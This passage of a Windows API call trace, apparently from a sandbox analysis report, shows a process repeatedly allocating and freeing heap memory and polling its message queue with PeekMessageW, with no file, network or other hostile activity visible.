hHeap=0x12c0000) returned 1 [0131.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0131.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.165] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0131.165] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0131.165] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.165] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.165] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0131.165] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0131.166] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.166] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0131.166] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.166] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0131.166] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.166] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0131.166] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.166] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0131.166] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0131.166] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.166] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0131.166] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0131.166] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.166] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0131.166] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.166] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.167] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0131.167] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.167] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.167] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0131.167] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.167] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0131.167] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.167] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0131.167] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.167] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0131.167] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0131.167] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.167] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.167] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0131.167] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0131.167] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0131.168] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0131.168] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0131.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0131.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e440 [0131.168] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e440 | out: hHeap=0x12c0000) returned 1 [0131.168] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0131.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0131.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0131.168] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0131.169] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0131.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0131.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0131.169] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0131.169] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0131.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.170] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0131.170] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e180 [0131.177] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.177] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0131.177] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0131.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0131.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0131.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0131.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0131.178] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0131.179] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.179] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0131.179] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0131.179] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0131.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0131.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0131.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0131.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0131.180] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.180] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0131.180] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0131.181] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0131.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.181] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0131.181] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0131.181] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.181] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.181] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0131.181] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0131.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0131.182] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0131.182] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0131.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.186] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.186] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.186] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.186] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0131.187] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0131.187] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0131.187] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.187] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0131.187] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0131.187] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0131.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0131.187] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0131.187] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0131.187] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.187] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0131.187] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.187] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0131.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0131.190] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0131.190] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0131.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0131.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0131.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0131.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0131.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0131.192] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e580 [0131.192] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e580 | out: hHeap=0x12c0000) returned 1 [0131.192] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.192] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.192] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0131.192] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0131.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0131.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0131.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.192] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0131.192] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.192] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.192] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3e8 [0131.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.192] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xe90) returned 0x133e030 [0131.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x131ba78 | out: hHeap=0x12c0000) returned 1 [0131.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3e8 | out: hHeap=0x12c0000) returned 1 [0131.193] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.193] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff5f0 [0131.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0131.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0131.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0131.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0131.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0131.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0131.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0131.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0131.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff5f0 | out: hHeap=0x12c0000) returned 1 [0131.218] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff5f0 [0131.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3e8 [0131.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0131.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0131.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3e8 | out: hHeap=0x12c0000) returned 1 [0131.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff5f0 | out: hHeap=0x12c0000) returned 1 [0131.219] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0131.219] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0131.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.219] 